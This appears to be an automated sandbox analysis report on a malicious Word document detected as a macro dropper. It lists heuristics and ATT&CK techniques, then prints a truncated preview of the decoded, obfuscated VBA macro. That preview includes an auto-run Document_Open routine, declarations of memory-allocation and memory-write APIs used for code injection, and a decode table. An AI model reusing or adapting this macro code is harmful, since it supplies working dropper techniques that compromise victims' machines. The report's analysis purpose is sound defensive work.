MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6406932-0'. It contains a VBA macro that is automatically executed via the Document_Open subroutine. This macro likely downloads and executes a second-stage payload, as indicated by the presence of obfuscated API calls and the general behavior associated with dropper malware. The document body content is unrelated to the malicious functionality.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6406932-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6406932-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10634 bytes |
SHA-256: 7397031ab65e553e8822592f8266439a7ebd2a36c39cf66d600856926cbe5936 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim exciting As Variant
Dim selfconceit As String
megahertz = "bolivian"
alarmism = disjointed
polska.photovoltaic
mothernaked = 49 + 9
Pmt 0, mothernaked, 20765, 25222, 3
End Sub
Attribute VB_Name = "unvanquished"
Attribute VB_Base = "0{FD689C69-81CA-4FF0-9F87-E9467C8BCEB4}{4AAE84EA-211F-46FB-AFF0-55CF5223A1E6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "budapesht"
' Dont die before I do
' And I can not resist
#If (63 - 68 + 405 + 2 - 18 + 316) > ((59 - 83 + 344) - (95 - 87 + 532) * 1) And ((77 - 17 - 32) - (2 - 16 + 42)) * 2 < (Win64) Then
' Doch ich weiß dass es dich gibt
' Your love I can't dismiss
Public Declare PtrSafe Function foist _
Lib "Ntdll " Alias _
"NtAllocateVirtualMemory" (perfumatory As LongPtr, diemaker As LongPtr, ByVal carbonyl As LongPtr, gentianByVal As LongPtr, chautauqua As LongPtr, ByVal primer As LongPtr) As LongPtr
' He comes to me every night
' Es ist kalt und regungslos
Public Declare PtrSafe Function collie _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (airframe As Any, ByVal parthis As Any, ByVal syria As Any, ByVal desensitized As Any, ByVal intangibility As Any, ByVal cervical As Any, ByVal bacitracin As Any) As Long
' Es ist kalt und regungslos
' I dont know who you are
Public Declare PtrSafe Function billing _
Lib "Ntdll " Alias _
"NtWriteVirtualMemory" (ByVal dobra As Any, ByVal antelope As Any, ByVal band As Any, ByVal oscines As Any, ByVal anaesthetic As Any) As LongPtr
' Ich weiß nicht wie du heißt
' I close my eyes and pass away
#End If
Function orites(cerate, beslubber, sarawak, fixer)
#If (118 - 100 + 382 + 65 - 102 + 337) > ((23 - 2 + 299) - (113 - 124 + 551) * 1) And Not ((105 - 99 + 22) - (90 - 98 + 36)) * 2 < (Win64) Then
Dim acknowledgement As Long
Dim manitoba As Long
Dim folks As Long
Dim halfprice As Long
Dim aneides As Long
#End If
#If (34 - 98 + 464 + 49 - 16 + 267) > ((79 - 117 + 358) - (48 - 58 + 550) * 1) And ((105 - 43 - 34) - (101 - 35 - 38)) * 2 < (Win64) Then
Dim manitoba As LongPtr
Dim acknowledgement As LongPtr
Dim halfprice As LongPtr
Dim folks As LongPtr
Dim aneides As LongPtr
#End If
acknowledgement = cerate
aneides = sarawak
folks = beslubber
beatnik = 48 + 22
Pmt 0, beatnik, 28582, 59814, 3
manitoba = 59 - 23 - 37
billing ByVal manitoba, acknowledgement, folks, aneides, halfprice
End Function
Attribute VB_Name = "polska"
Function bored()
Dim riot(255) As Byte
transmitter = 106 - 113 + 72
Do While transmitter <= 90 + 1
riot(transmitter) = transmitter - 65
transmitter = transmitter + 1
Loop
transmitter = 48
Do While transmitter <= 50 + 8
riot(transmitter) = transmitter + 4
transmitter = transmitter + 1
Loop
transmitter = 97
Do While transmitter <= 120 + 3
riot(transmitter) = transmitter - 71
transmitter = transmitter + 1
Loop
riot(47) = 63
transmitter = 43
riot(transmitter) = 60 + 2
bored = riot
End Function
Function photovoltaic()
Dim spectrometric As Byte
Dim dollhouse As Long
unvanquished.samarskite.Value = Day(#12/5/2013#)
varday = armillary = "intrastate"
bonnebouche = hyoscyamus
peacockblue = "horsetail"
buffoonish = "heterometabolous"
festoon = autacoid
pediatrics = "capo"
bisect = "saddled"
ladyseardrop = carousel
Set placability = unvanquished.samarskite.SelectedItem
valence = 54 + 42
Pmt 0, valence, 13418, 22341, 2
arena = placability.Name
disequilibrium = 107 - 58 + 7795
anostraca = Right(arena, disequilibrium)
tirana = sertan.racetrack(anostraca)
euglena = 32 + 28
Pmt 0, euglena, 34695, 25765, 5
gainful = "circuition"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.